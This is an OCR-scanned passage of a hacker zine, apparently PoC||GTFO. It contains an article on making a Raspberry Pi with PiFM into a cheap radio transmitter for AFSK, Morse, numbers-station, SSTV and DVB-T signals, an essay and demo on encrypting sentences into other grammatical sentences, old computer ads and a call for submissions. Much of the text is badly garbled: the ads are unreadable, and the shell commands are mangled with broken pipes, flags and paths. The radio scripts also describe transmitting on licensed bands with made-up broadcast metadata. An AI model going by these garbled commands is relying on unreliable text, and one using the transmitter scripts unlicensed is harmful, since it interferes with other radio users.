Hr^NC($Y OLPHAM ^M/^CK. gOT ^_$T V. 




ToM, YOU Ve REALLY GOT To C?ET 4 
R0B6T4OO CON^e^BR FCR YOu« 
STATfOf^^. VOUJ? XYi. ANO k^'P^ ^'iV.^y 
REALLY GET /NTo TmE ACTIOA^ W/TH IT/ 



NCrr wiT>4 TMe R0B0T40OcoMVeRTeR tom, 

TUST PlUCb IT IMTO VOU^? ^RMSCEIVER, CONNBCT 
MONlTGR Of? VOUR MOME TV ^ET/ TUNE TO 
AND YOU'f^E \N OPBRAT\ON// ^ 




SiNCE YCCI U5£ YOUR 
HOMETvSETAS A 
MONITOI?,'' ALL iT 

POf?THE K0BOr400 
CONVERTEI?. Wf?)TC ^ 
TODAY FOR YOUR 
S5TV FACT PACK 
P/?OM ROBOT. 

TfeLLS ALL ABOUT 
SSTV/ 




[BQBDTl Sflf 



7591 CONVOV CT. 
SAN DIEGO.CA 92»! 
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11 Naughty Signals; or, the Abuse of a Raspberry Pi 



by Russell Handorf 



There are a lot of different projects that have 
rejuvenated interest in HAM Radio, more notably 
Software Defined Radio (SDR). The more promi- 
nent projects and products are the USRP by Ettus 
Research, BladeRF by Nuand, and the HackRF by 
Mike Ossmann (in the order from the most expen- 
sive to least expensive). These radios vary in capa- 
bihty and have their own distinct utihty, depending 
on what radio communication you'd like to study; 
however, if ah you are specifically interested in is re- 
ceiving a simphstic signal, then the Realtek SDR is 
typically the best and cheapest choice. This article 
will show you how to combine a Realtek SDR and 
a Raspberry Pi into a poor man's software defined 
radio tool for exploring how to receive and transmit 
in related radio systems. 



code that generated spread-spectrum clock signals 
to output FM on GPIO pin #4. Ohver Mattos and 
Oskar Weigl have since enhanced PiFM to add more 
capabilities. 

Be aware, however, that this technique has an- 
other problem beyond bleeding RF and having to 
use filters. Namely, the transmitter doesn't shut 
down gracefuUy after you quit PiFM. Therefore, 
you'U need a script to silence the transmission. We'U 
call it pi-shutdown. sh in the various examples that 
foUow. 



#/bin /bash 
#pi— shutdown . sh 

touch /tmp/empty && /home/ pi /pifm /tmp/empty 



11.1 Bandpass Filter 

It is very important to have and to use a band- 
pass filter when using the Raspberry Pi as an FM 
transmitter, because PiFM is essentially a square 
wave generator. This means that you'U have a lot 
of harmonics as depicted in Figure 21. While the 
direct operational frequency range of PiFM is ap- 
proximately 1 MHz to 250 MHz, the harmonics are 
still strong enough to reach frequencies below 1 MHz 
and as high as 500 MHz. 

Because of these square wave characteristics, a 
mechanical SAW filter would be ideal to be able to 
control the frequencies you wish to transmit. How- 
ever, there filters can set you back more than the 
Raspberry Pi, and may be hard to come by, unless 
there's a neighborly Ham Radio Outlet near you. So 
you may have to make your own band-pass filter. 

To make your own high band and/or low band 
pass filters, you can assemble them based on the 
schematic in Figure 19.^^ Parts for the various am- 
ateur bands are listed in Figure 20. 

11.2 Raspberry Pi FM Transmitter 

For over a year now, it has been documented how 
to turn the Raspberry Pi into an FM transmitter 
by using the PiFM software.^^ Richard Hirst first 
demonstrated this technique in some C and Python 

^^http : / /www . kitsandparts . com/univlpf ilter . php 
^^https : //github . com/rm-hull/pif m 



11.3 AFSK 

Audio Frequency Shift Keying (AFSK) is simply 
a method to modulate digital data as an analogue 
tone; you'll certainly recognize this as the tones your 
modem made. AFSK characteristicaUy represents 1 
as a "mark" and 0 as a "space". While not fast, 
AFSK does work very well in many applications 
where data is communicated over a consistent radio 
frequency. Because of these attributes, AFSK is fre- 
quently used for radio communications in industrial 
apphcations, embedded systems, and more. Using 
a program called minimodem, you'U be easily able 
to receive and transmit AFSK with a Realtek SDR 
and a Raspberry Pi. Marcl from kprod.eu demon- 
strated some very simple techniques for doing so, 
which a few other neighbors have been tweaked and 
updated in the examples to foUow. 

To receive 1200 baud AFSK transmissions, a 
one-line script is all that's needed: 

1 rtl_fm -f 146.0M ^ wbfm -s 200000 \ 

-r 48000 -o 6 \ 

3 I sox -traw -r48k -es -bl6 -cl -VI - \ 

— twav — \ 
5 I minimodem — rx —8 1200 



What's happening here is that the program 
rtl_fm is tuned to 146.0 MHz, sampling at 200,000 
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samples per second and converting the output at a 
sample rate of 48000 Hz. The output from this is 
sent to sox, which is converting the audio received 
to the WAV file format. The output from sox is 
then sent to minimodem, which is decoding the WAV 
stream at 1200 baud, 8 bit ASCII. 

Transmitting an AFSK signal is just as easy: 



echo "knock knock . . . : ' date +%c ' " 
I minimodem — tx — f —8 1200 

— f /home/ pi / sent ence . wav 
/home/ pi / pifm /home/ pi/sentence. wav 

146.0 48000 
/home/ pi / pi— shutdown . sh 



11.4 Other Transmission Examples 

Because of the scriptabihty and simphcity of PiFM, 
other forms of transmissions become easily achiev- 
able too. 



Numbers Station 

A numbers station is typicahy a government-owned 
transmitter that sends encoded messages to spies, 
operators, or employees of that said government 
anywhere in the world, where the messages are typ- 
icahy one way and seemingly random. The script 
below mimics the Cuban numbers station identified 
as HMOl.^'' What is interesting about it is that the 
data it sends is encoded with a common HAM Ra- 
dio protocol caUed RDFT. Transmitting RDFT on a 
Raspberry Pi can be difficult, therefore using a sim- 
ple FM transmission of TH0R8 or QPSK256 should 
be adequate; using FLDIGI should be of great help 
to create these messages. 

A script can easily speak a series of words into 
the air by piping them into the text2wave utihty: 



system("echo $text | text2wave -F 22050 
"I /home/pi/pifm - 144 22050"); 



Morse Code (CW) 

Either done by playing a pre-made audio file with 
dits and dahs, or by using the cwwav program 
written by Thomas Horsten to output directly to 
PiFM.^^ 



echo hello world 


\ 


1 cwwav -f 700 -w 20 


\ 


— o /home/ pi /morse . wav 




/home/ pi /pifm /home/ pi /morse . wav 


\ 


146.0 48000 




/home/ pi / pi— shutdown . sh 





^^https : //github . com/Kerrick/cwwav 

^^http : / / www . qsl . net /py4zbz/ eni . htm 
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DVBT with Metadata 

One common practice for those who work with the 
RTL dongle is to remove to remove the DVB-T 
digital television kernel module. To receive this 
chaUenge, however, you wiU need to re-enable that 
module. To transmit it, you'U need hardware from 
Hides,^^ which can be had for a very low cost. The 
script below works with the UT-IOOC. 



^http : //www . hides . com . tw/product_cg74469_eng . html 



Ll 
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L3 






Figure 19: Bandpass Filter for Reducing PiFM Harmonics 
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modprobe usb— it950x 
mkfifo ~/desktop 

avconv -f xllgrab -s 1024x768 \ 

— framerate 30 — i :0.0 \ 
-vcodec libx264 -s 720x576 \ 

— f mpegts \ 

— mpegts_original_network_id 1 \ 

— mpegts_transport _stream_id 1 \ 
— mpegts_service_id 1 \ 
— metadata \ 

service_provider="FCC CALL SIGN" \ 

— metadata \ 
service_name=" D ialin for Dollars ! " \ 
— muxrate 3732k — y ~/desktop & 

tsrfsend ~/desktop 0 730000 6000 4 \ 
1/2 1/4 8 0 0 & 



SSTV 

Gerrit Polder developed a simple means of convert- 
ing an image into a SSTV signal and then sending 
it out via the PiFM utihty. Using his program, PiS- 
STV^ command hne transmissions of SSTV broad- 
casts with the Raspberry Pi are easy to achieve with- 



out the need for a graphical environment. 

11.5 Howdy to the caring Neighbors 

Thanks to the PiFM program, there are many 
portable options aUowing HAM operators, experi- 
menters, and miscreants to explore and butcher the 
radio waves on the cheap. The main goal of this ar- 
ticle is to document the work of many friendly folks 
in this arena, gathering in one place the information 
currently scattered across the bits and bobs of the 
Internet. Owing to the briUiant hacks of these neigh- 
bors, it should become apparent why any radio nut 
should consider having a Raspberry Pi armed with 
a filter and some code. While out of scope for the 
article, it should also become clear how you too can 
make a very inexpensive and portable HAM station 
for a large variety of digital and analog modes. 

I'd hke to extend a warm, hearty, and, even- 
tuaUy, beer-supplemented thank-you to Dragorn, 
Zero_Chaos, Rick MeUendick, DaKahuna, Justin 
Simon, Tara MiUer, Mike Ossmann, Rob Ghilduta, 
and Travis Goodspeed for their direct support. 
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Figure 20: Filter Bill of Materials 
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Figure 21: PiFM Harmonic Eniissions 
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ACT-I 



MICRO-TERM INC. 




$525 complete with high resolution 9" monltor • $400 wlthout 
monltor inclUDED FEATURES: 

• Underline Cursor • 64 characters by 16 llnes 

• RS232C or Current Loop • Auto Scrolllng 

• All oscillators (horiz , vert., • Data Rates of 110, 300, 600, 
baud rate, and dot size) are 1200, 2400, 4800, and 9600 
crystal controlled baud are jumper selectable 

The ACT-I is a complete teletype replacement compatible with 

any processor which supports a serial 1/0 port. Completely 
assembled and dynamically tested. 
Prices FOB St. Louis Mastercharge and Bani<Americard 



THE AFFORDABLE CRT TERMINAL 



MICRO-TERM INC. P.O. BOX 9387 ST. LOUIS, MO. 63117 

(314) 645-3656 
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12 Weird cryptography; or, 

How to resist brute-force attacks. 



by Philippe Teuwen 

^'Unhreakable, sir?'^ she said uneasily. 'What about the Bergofsky Principle?" 

Susan had learned about the Bergofsky Principle early in her career. It was a cornerstone of brute- 
force technology. It was also Strathmore^s inspiration for building TRANSLTR. The principle 
clearly stated that if a computer tried enough keys, it was mathematically guaranteed to find the 
right one. A code ^s security was not that its pass-key was unfindable but rather that most people 
didn't have the time or equipment to try. 

Strathmore shook his head. '^This code ^s different. 

'^Different?^^ Susan eyed him askance. An unbreakable code is a mathematical impossibility! He 
knows that! 

Strathmore ran a hand across his sweaty scalp. ''This code is the product of a brand new encryption 
algorithm—one we've never seen before.'^ 

[...] 

''Yes, Susan, TRANSLTR will always find the key—even if it's huge.^^ He paused a long moment. 
'Vnless. . . 

Susan wanted to speak, but it was clear Strathmore was about to drop his bomb. Unless what? 
"Unless the computer doesn't know when iVs broken the code.'^ 
Susan almost fell out of her chair. 'What!^^ 

'Vnless the computer guesses the correct key but just keeps guessing because it doesn't realize it 
found the right key. Strathmore looked bleak. think this algorithm has got a rotating cleartext. 

Susan gaped. 

The notion of a rotating cleartext function was first put forth in an obscure, 1987 paper by a 
Hungarian mathematician, Josef Harne. Because brute-force computers broke codes by examining 
cleartext for identifiable word patterns, Harne proposed an encryption algorithm that, in addition 
to encrypting, shifted decrypted cleartext over a time variant. In theory, the perpetual mutation 
would ensure that the attacking computer would never locate recognizable word patterns and thus 
never know when it had found the proper key. 

Yes, we are in a pure sci-fi techno-thriller. Some of you may have recognized this excerpt from the Digital 
Fortress by Dan Brown, pubhshed in 1998. Not surprisingly, there is no such thing as the concept of rotating 
cleartext or Bergofsky Principle, and Josef Harne never existed. 

There is still a germ of an interesting idea: What if "the computer guesses the correct key but just keeps 
guessing because it doesn't reahze it found the right key"? Instead of trying to conceal plaintext in yet 
another layer of who-knows-what, let's try to make the actual plaintext indistinguishable from incorrectly 
decoded ciphertext. It would be a bit similar to format-preserving encryption (FPE)^^ where ciphertext 
looks similar to plaintext and honey encryption,^^ which both share the motivation to resist brute-force. 
But beyond single words and passwords, I want to encrypt fuh sentences. . . into other grammaticahy correct 
sentences! Now if Eve wants to brute-force such an encrypted message, every single wrong key would produce 
a somehow plausible sentence. She would have to choose amongst ah "decrypted" plaintext candidates for 
the one that was my initial sentence. 

So starts a war of natural language models. . . Anything the cryptanalyst can find to discard a candidate 
can be used in turn to tune the initial grammar model to create more plausible candidates. The problem 

^^https : //en. wikipedia. org/wiki/Format-preserviiig_eiicryptioii 
^^http : //pages . cs . wisc . edu/ rist/papers/HoneyEncryptionpre .pdf 
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for the cryptanalyst C can be expressed as a variation of the Turing test, where the test procedure is not a 
dialog but consists of presenting n texts, of which n — 1 were produced by a machine A, and only one was 
written by a human B (cf. Fig. 22.) 




Figure 22: Turing test, our way. 



We'h start with a mapping between sentences and their numerical representations. Let's represent a 
language by a graph. Each sentence is one path through the language graph. Taking another random 
path will lead to another grammaticahy correct sentence. To encrypt a message, the first step is to encode 
it as a description of the path through the grammar graph. This path has to be identified numericahy 
(enumerated) among the possible paths. Ideahy, the enumeration must be balanced by the frequency of 
common grammatical constructions and vocabulary, something you get more or less for free if you manage 
to map some Huffman coding onto it. If there is a complete map between ah the paths up to a given length 
and a bounded set of integers, then we have the guarantee that any random pick in the set wih be accepted 
by the deciphering routine and wih lead to a grammaticahy correct sentence. So the numerical representation 
can now be ciphered by any classic symmetric cipher. 

A complete solution has to fohow a few additional rules. It must not include any metadata that would 
confirm the right key when brute-forced, so e.g., it shouldn't introduce any checksum over the plaintext that 
could be used by an attacker to validate candidates! And any wrong key should lead to a proper deciphering 
and a valid sentence, no exception. 

Such encoding method covering a balanced language graph could serve as a basis for a pretty cool natural 
language text compressor, which works a bit like ordering the numbers 3, 10, and 12 in a Chinese restaurant. 
(I recommend the 12.) 

In practice, some junk can be tolerated in the brute-forced candidates; in fact, even a lot of junk could 
be fine! For example, 99% of detectable junk would lead to a loss of just 6.6 bits of key material. 

12.1 Enough talk. Show me a PoC or you-know-what! 

Fair enough. 

We need to parse English sentences, so a good starting point may be grammar checkers: 

$ apt-cache show link - grammar 

Descr ipt ion - en : Carnegie Mellon University ' s link grammar parser 

In Selator , D. and Temperly , D. "Parsing English with a Link 
Grammar" (1991) , the authors defined a new formal grammatical system 
called a "link grammar " . A sequence of words is in the language of a 
link grammar if there is a way to draw "links" between words in such a 
way that the local requirements of each word are satisfied, the links 
do not cross , and the words form a connected graph . The authors 
encoded English grammar into such a system , and wrote this program to 
parse English using this grammar . 
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link-grammar sounds like a good tool to play with. 

Here is, for example, how it parses a quote from Jesse Jackson: ''I take my role seriously as a pastor'\ 

+ MVp + 

+ MVa + I 

+ Os + I + Js + 

+-Sp*i+ +-DS-+ I I +--DS-+ 

I I I I I III 

I.p take.v my role.n seriously as . p a pastor.n 

The difhculty is the enumeration of paths that would cover the key space if we want to map one path 
to another one. So, for a first attempt, let's keep the grammatical structure of the plaintext, and we will 
replace every word by another that respects the same structure. After wrapping some Bash scripting around 
link-grammar and its dictionaries, here's what we can get: 



$ echo "my example illustrates 


a means to obfuE 


5cate 


a complex sentence easily" 


. / encode 


@23:2 n. 1:2865 v. 4. 2:1050 a n 


1:4908 to v.4.1 


1352 


a adj. 1:720 n. 1:7124 adv . 1 


369 



This is one possible encoding of the input: every word is replaced by a reference to a wordhst and its 
position in the hst. Hopefuhy, another script aUows us to reverse this process: 

$ echo "my example illustrates a means to obfuscate a complex sentence easily " I . / encode I . /decode 
my example illustrates a means to obfuscate a complex sentence easily 



So far, so good. Now we will encode the positions using a secret key (123 in this example) with a very 
very stupid 16-bit numeric cipher. 



$ echo "my 
@23 : 1 n. 1 


example illustrates a means to obfuscate a 
7695 V. 4. 2:2054 a n. 1:2759 to v. 4. 1:2070 a 


complex sentence easily"| 
adj . 1 : 2518 n . 1 : 5439 adv . 1 


/ encode 
123 


123 






$ echo "my 
my example 


example illustrates a means to obfuscate a 
illustrates a means to obfuscate a complex 


complex sentence easily"| 
sentence easily 


/ encode 


1231 


. / decode 


123 


$ echo "my 
its storey 


example illustrates a means to obfuscate a complex sentence easily"| 
siphons a blink to terrify a sublime filbert irretr ievably 


/ encode 


123 1 


. / decode 


124 



Using any wrong key would lead to another grammaticaUy correct sentence. So we managed to build an 
(admittedly stupid) crypto system that is pretty hard to bruteforce, as all attempts would lead to grammat- 
icaUy correct sentences, giving no clue to the bruteforcing attacker. It is nevertheless only moderately hard 
to break, because one could, for example, classify the results by frequency of those words or word groups in 
English text to keep the best candidates. But the same reasoning can be used to enhance the PoC and get 
better statistical results, harder for an attacker to disquahfy. 

ActuaUy, we can do better: let's send one of those weird sentences instead of the encoded path. This 
gives plausible deniability: you can even deny it is a message encoded with this method, and claim that you 
wrote it after partaking of a few Laphroaig Quarter Cask ;-) British neighbors are advised, however, that if 
this leads to the UK banning Laphroaig Quarter Cask for pubUc safety reasons, the Pastor might no longer 
be their friend. 

$ echo "my example illustrates a means to obfuscate a complex sentence easily " I . / encode l./decode 123 
your search cements a tannery to escort a unrelieved clause exuberantly 



This can be deciphered by whoever knows the key: 

$ echo "your search cements a tannery to escort a unrelieved clause exuberant ly " I . / encode 123|./decode 
my example illustrates a means to obfuscate a complex sentence easily 



And an attempt to decipher it with a wrong key gives another grammaticaUy correct sentence: 
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$ echo "your search cements a tannery to escort a unrelieved clause exuberant ly " I . / encode 124|./decode 
your scab slakes a bluffer to integrate a introspect ive hamburger provocat ively 



If someone attempts to brute-force it, she would end up with something hke this: 

$ echo "your search cements a tannery to escort a unrelieved clause exuberantly " I . /brutef orce 

22366 rtheir presentiment reprehends a saxophone to irk a topless mind perennially 
22367: your cry compounds a examiner to shoulder a massive bootlegger unconsciously 
22368 :our handcart renounces a lamplighter to imprint a outbound doorcase weakly 

22369:my neurologist fascinates a plenipotent iary to butcher a psychedelic imprint automat ically 

22370: their safecracker vents a spoonerism to refurnish a shaggy parodist complacently 

22371 :your epicure extols a governor to belittle a indecorous clip heatedly 

22372 : our kilt usurps a monger to punish a loud foothold indirectly 

22373 : my piranha mugs a resistor to evict a obstetric malaise laconically 

22374: its controller unsettles a duchess to ponder a diversionary beggar riotously 

22375:your glen mollifies a interjection to embezzle a forgetful decibel speciously 

22376 :our misdeal countermands a pedant to typify a imperturbable heyday topically 

22377: their bower misstates a colloquiali sm to disorientate a apoplectic warrantee courteously 

22378: its downpour copies a frolic to sweeten a circumspect cavalcade dispiritedly 

22379 : your infidel resurrects a masseuse to manufacture a differential fairway famously 

22380 : my abstract contaminates a birthplace to squire a unaltered subsection lukewarmly 

22381 :their co-op resents a deuce to inveigle a unsubtle attendant ob j ect ionably 



The scripts are available in this issue's PDF/ZIP, but the PDF itself can be used to secure your 
communications— because why not? 



$ chmod +x pocorgtfo08.pdf 






$ echo " encrypt this sentence !" 


1 . /pocorgtf o08 . pdf - 


-e 12345 


besmirch this carat ! 






$ echo "besmirch this carat !" I 


. /pocorgtf o08 . pdf -d 


12345 


encrypt this sentence ! 







The PDF includes an ELF x86-64 version of link-grammar, so you wiU need to execute the PDF on a 
matching platform. Any 64-bit Debian-like distro with libaspelll5 installed should do. 

For extra credit, you may construct a meaningful sentence that encodes to Chomsky's famously mean- 
ingless but grammatical example, "Colorless green ideas sleep furiously." 

Ideas presented in this httle essay were first discussed by the author at Hack.lu 2007 HackCamp. 

Have fun! 
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13 Fast Cash for Cyber Munitions! 



by Pastor Manul Laphroaig, 
Unlicensed Proselytizer 
International Church of the Weird Machines 

Howdy, neighbor! 

Are you one of those merchants of cyber-death that certain Thought Leading Technologists keep warning 
us about? Have you been hoarding bugs instead of sharing them with the world? Weh, at this church we 
won't judge you, but we'd be happy to judge your proofs of concept, sharing the best ones with our beloved 
readers. 

So set that httle PoC free, neighbor, and let it come to me, pastor@phrack«org! 



Do this: write an email tehing our editors how to do reproduce ONE clever, technical trick from your 
research. If you are uncertain of your Enghsh, we'h happily translate from French, Russian, or German. If 
you don't speak those languages, we'll draft a translator from those poor sods who owe us favors. 

Like an email, keep it short. Like an email, you should assume that we already know more than a bit 
about hacking, and that we'h be insulted or— WORSE!— that we'h be bored if you include a long tutorial 
where a quick reminder would do. 

Just use 7-bit ASCII if your language doesn't require funny letters, as whenever we receive something 
typeset in OpenOffice, we briefly mistake it for a ransom note. Don't try to make it thorough or broad. 
Don't use Powerpoint buhet-points. Keep your code samples short and sweet; we can leave the long-form 
code as an attachment. 

Do pick one quick, clever low-level trick and explain it in a few pages. Teach me how to distinguish 
real errors from intentionahy mistransmitted symbols over radio. Show me how to reverse engineer firmware 
from a combine harvester. Don't tell me that it's possible; rather, teach me how to do it myself with the 
absolute minimum of formality and bullshit. 

Like an email, we expect informal (or faux-biblical) language and hand-sketched diagrams. Write it in 
a single sitting, and leave any editing for your poor preacherman to do over a bottle of fine scotch. Send 
this to pastor@phrack^org and hope that the neighborly Phrack folks— praise be to them!— aren't man-in- 
the-middling our submission process. 

Yours in PoC and Pwnage, 
Pastor Manul Laphroaig, D.D. 
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